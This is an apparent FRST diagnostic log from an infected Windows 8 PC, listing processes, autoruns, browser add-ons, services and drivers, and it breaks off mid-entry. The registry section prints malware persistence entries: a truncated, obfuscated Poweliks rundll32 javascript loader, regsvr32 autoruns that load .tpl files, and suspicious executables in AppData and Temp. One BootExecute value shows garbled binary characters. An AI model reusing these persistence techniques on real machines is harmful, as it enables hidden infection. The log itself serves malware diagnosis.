provide. FRST.txt: Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 23-09-2014 Ran by Kulle (administrator) on OFFICE_PC on 23-09-2014 13:34:45 Running from C:\Users\Kulle\Desktop Platform: Windows 8 (X64) OS Language: English (United States) Internet Explorer Version 10 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe () C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Qualcomm Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe () C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe (Microsoft Corporation) C:\Windows\System32\dasHost.exe (iolo technologies, LLC) C:\Program Files (x86)\iolo\Common\Lib\ioloServiceManager.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (Protexis Inc.) C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe (iolo technologies, LLC) C:\Program Files (x86)\iolo\System Mechanic Professional\LiveBoost.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (iolo technologies, LLC) C:\Program Files (x86)\iolo\System Mechanic Professional\ioloGovernor64.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe (Qualcomm Atheros) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtTray.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Hauppauge Computer Works, Inc.) C:\Program Files (x86)\WinTV\WinTV7\WinTVTray.exe () C:\Program Files (x86)\Roxio 2012\5.0\CPMonitor.exe (Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\AllShare\AllShareAgent.exe (AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe (Dell Products, LP.) C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe (Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\AllShare\AllShareDMS\AllShareDMS.exe (SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe (SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Toaster.exe (SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\DBRUpdate\DBRUpd.exe () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRCrawler.exe (Google Inc.) C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe (Microsoft Corporation) C:\Windows\System32\Taskmgr.exe (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE (ArcSoft, Inc.) C:\Program Files (x86)\ArcSoft\TotalMedia ShowBiz\TMShowBiz.exe (Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe (RealNetworks, Inc.) C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [btTray] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtTray.exe [757888 2012-07-02] (Qualcomm Atheros) HKLM\...\Run: [btvStack] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe [127104 2012-07-02] (Qualcomm Atheros Commnucations) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1212560 2012-06-13] (Realtek Semiconductor) HKLM\...\Run: [bCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation) HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [1796056 2014-08-19] (NVIDIA Corporation) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [iSUSPM] => C:\ProgramData\FLEXnet\Connect\11\\isuspm.exe [324976 2010-05-21] (Flexera Software, Inc.) HKLM-x32\...\Run: [CPMonitor] => C:\Program Files (x86)\Roxio 2012\5.0\CPMonitor.exe [84464 2011-07-08] () HKLM-x32\...\Run: [AllShareAgent] => C:\Program Files (x86)\Samsung\AllShare\AllShareAgent.exe [285072 2012-03-01] (Samsung Electronics Co., Ltd.) HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.) HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [4085896 2014-09-23] (AVAST Software) HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Symantec <====== ATTENTION HKU\S-1-5-21-2997053151-1021370575-3583938921-1001\...\Run: [vmware-unity] => C:\Users\Kulle\AppData\Roaming\vmware-unity.exe HKU\S-1-5-21-2997053151-1021370575-3583938921-1001\...\Run: [CryptoUpdate] => C:\Windows\system32\regsvr32.exe /s "C:\Users\Kulle\AppData\Roaming\Microsoft\Crypto\RSA\cert_v64_2.tpl" HKU\S-1-5-21-2997053151-1021370575-3583938921-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2012-12-03] (Google Inc.) HKU\S-1-5-21-2997053151-1021370575-3583938921-1001\...\Run: [dosklder] => C:\Users\Kulle\AppData\Local\Temp\ctfminit.exe <===== ATTENTION HKU\S-1-5-21-2997053151-1021370575-3583938921-1001\...\Run: [a73b28d] => C:\Users\Kulle\AppData\Roaming\a73b28d.exe HKU\S-1-5-21-2997053151-1021370575-3583938921-1001\...\RunOnce: [CryptoUpdate] => C:\Windows\system32\regsvr32.exe /s "C:\Users\Kulle\AppData\Roaming\Microsoft\Crypto\RSA\cert_v65_0.tpl" HKU\S-1-5-21-2997053151-1021370575-3583938921-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinTV Recording Status.lnk ShortcutTarget: WinTV Recording Status.lnk -> C:\Program Files (x86)\WinTV\WinTV7\WinTVTray.exe (Hauppauge Computer Works, Inc.) ShellIconOverlayIdentifiers: 00avast -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll (AVAST Software) BootExecute: autocheck autochk /p \??\Y:autocheck autochk /m /P \Device\HarddiskVolume17autocheck autochk /m /P \Device\HarddiskVolume16>"䷰Ljᎀ痤γڧ瀀!࠴αڥڥ쀴ǎ태ڧ여ǐⓌǕ檤γED!ly.ֽ끌፭䗠Ǟ㍰ፄĀĀ¾태๴ȀЂ๻矠Ϯ채๴ዌ㌼ץ쒜๴ ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com/?fr=fp-yie10 HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.yahoo.com/?fr=fp-yie10 URLSearchHook: HKCU - YTNavAssistPlugin Class - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn3\yt.dll (Yahoo! Inc.) StartMenuInternet: IEXPLORE.EXE - %ProgramFiles(x86)%\Internet Explorer\iexplore.exe SearchScopes: HKLM - {BC16EF96-1661-4F71-B6D9-3ED7FA2FD127} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MDDCJS SearchScopes: HKLM-x32 - {BC16EF96-1661-4F71-B6D9-3ED7FA2FD127} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MDDCJS SearchScopes: HKCU - {58A18107-2583-4955-B7B7-98DEEB51017C} URL = http://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie10 SearchScopes: HKCU - {870653A8-9FC7-4D12-8A65-34EE256D6381} URL = https://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie10 SearchScopes: HKCU - {BC16EF96-1661-4F71-B6D9-3ED7FA2FD127} URL = SearchScopes: HKCU - {CB60D13D-6D6A-4763-9863-859F795E53C4} URL = http://www.flickr.com/search/?q={searchTerms} SearchScopes: HKCU - {EC947625-E22A-45ED-BE14-550262FB5BCE} URL = http://delicious.com/search?p={searchTerms} BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation) BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Qualcomm Atheros Commnucations) BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software) BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) BHO-x32: No Name -> {300BEC06-B743-4D19-86B9-11DC711D7FFB} -> No File BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader) BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software) BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.) Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.) DPF: HKLM-x32 {82774781-8F4E-11D1-AB1C-0000F8773BF0} https://transfers.ds.microsoft.com/FTM/TransferSource/grTransferCtrl.cab Handler: WSIEChrome - No CLSID Value - Handler-x32: WSIEChrome - No CLSID Value - Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 FireFox: ======== FF ProfilePath: C:\Users\Kulle\AppData\Roaming\Mozilla\Firefox\Profiles\7wnw9rol.default FF Homepage: hxxp://www.yahoo.com/ FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_117.dll () FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.) FF Plugin: @java.com/DTPlugin,version=10.9.2 -> C:\Windows\system32\npDeployJava1.dll (Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=10.9.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation) FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation) FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_117.dll () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () FF Plugin-x32: @divx.com/DivX Browser Plugin,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC) FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation) FF Plugin-x32: @real.com/nppl3260;version=16.0.3.51 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.) FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.) FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.) FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.) FF Plugin-x32: @real.com/nprpplugin;version=16.0.3.51 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer) FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @videolan.org/vlc,version=2.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN) FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN) FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN) FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Kulle\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online) FF Extension: Yahoo! Toolbar - C:\Users\Kulle\AppData\Roaming\Mozilla\Firefox\Profiles\7wnw9rol.default\Extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1} [2014-06-22] FF Extension: Print / Print Preview (Update) - C:\Users\Kulle\AppData\Roaming\Mozilla\Firefox\Profiles\7wnw9rol.default\Extensions\printprintpreview-andrewsfirefoxextensions@gmail.com.xpi [2013-09-09] FF HKLM-x32\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5 FF Extension: DivX Plus Web Player HTML5 <video> - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2013-05-25] FF HKLM-x32\...\Firefox\Extensions: [{DF153AFF-6948-45d7-AC98-4FC4AF8A08E2}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-05-29] FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF FF Extension: avast! Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2014-09-23] FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext Chrome: ======= CHR Profile: C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Drive) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2012-12-03] CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-23] CHR Extension: (YouTube) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-12-03] CHR Extension: (Google Search) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-12-03] CHR Extension: (SelectionLinks) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdcnnmifdmlmjffdgeieikcokcogpbej [2013-02-24] CHR Extension: (Google Wallet) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22] CHR Extension: (DivX Plus Web Player HTML5 <video>) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm [2013-05-25] CHR Extension: (Gmail) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-12-03] CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-09-23] CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-08-14] CHR HKLM-x32\...\Chrome\Extension: [kdcnnmifdmlmjffdgeieikcokcogpbej] - C:\Program Files (x86)\OApps\chromeaddon2.crx [2012-12-28] CHR HKLM-x32\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - C:\Program Files (x86)\DivX\DivX Plus Web Player\chrome\DivXHTML5\DivXHTML5.crx [2011-05-23] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 9734BF6A-2DCD-40f0-BAB0-5AAFEEBE1269; C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe [457200 2011-02-09] () R2 AtherosSvc; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe [128640 2012-07-02] (Qualcomm Atheros Commnucations) R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-09-23] (AVAST Software) R2 BOT4Service; C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe [21488 2011-07-15] () S4 BOTService; C:\Program Files (x86)\Roxio\BackOnTrack\Instant Restore\BOTService.exe [211440 2011-07-14] (Rovi Corporation) S2 HauppaugeTVServer; C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe [577536 2013-01-25] (Hauppauge Computer Works) [File not signed] S3 HcwDevCentralService; C:\Program Files (x86)\Hauppauge\DeviceCentral\HcwDevCentralService.exe [401232 2013-02-07] (Hauppauge Computer Works, Inc.) R2 IAStorDataMgrSvc; C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [7168 2012-07-09] (Intel Corporation) [File not signed] R2 ioloSystemService; C:\Program Files (x86)\iolo\Common\Lib\ioloServiceManager.exe [4700872 2014-08-12] (iolo technologies, LLC) S4 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-18] (Intel Corporation) S3 KeyIso; C:\Windows\SysWOW64\keyiso.dll [43520 2012-07-25] (Microsoft Corporation) R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation) S2 MSSQLSERVER; c:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe [62111072 2011-06-17] (Microsoft Corporation) S3 Netlogon; C:\Windows\SysWOW64\netlogon.dll [634368 2012-07-25] (Microsoft Corporation) R2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-08-14] () S4 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [254512 2012-04-24] () S4 RoxMediaDB13; C:\Program Files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe [1095664 2011-07-13] (Rovi Corporation) S4 RoxWatch12; C:\Program Files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe [340976 2011-07-13] (Rovi Corporation) R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe [1915480 2013-05-23] (SoftThinks SAS) S4 SQLSERVERAGENT; c:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE [431456 2011-06-17] (Microsoft Corporation) S3 StorSvc; C:\Windows\SysWOW64\storsvc.dll [18432 2012-07-25] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [16056 2014-03-29] (Microsoft Corporation) S4 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [77824 2012-06-19] (Atheros) [File not signed] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29208 2014-09-23] () R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [79184 2014-09-23] (AVAST Software) R1 aswRdr; 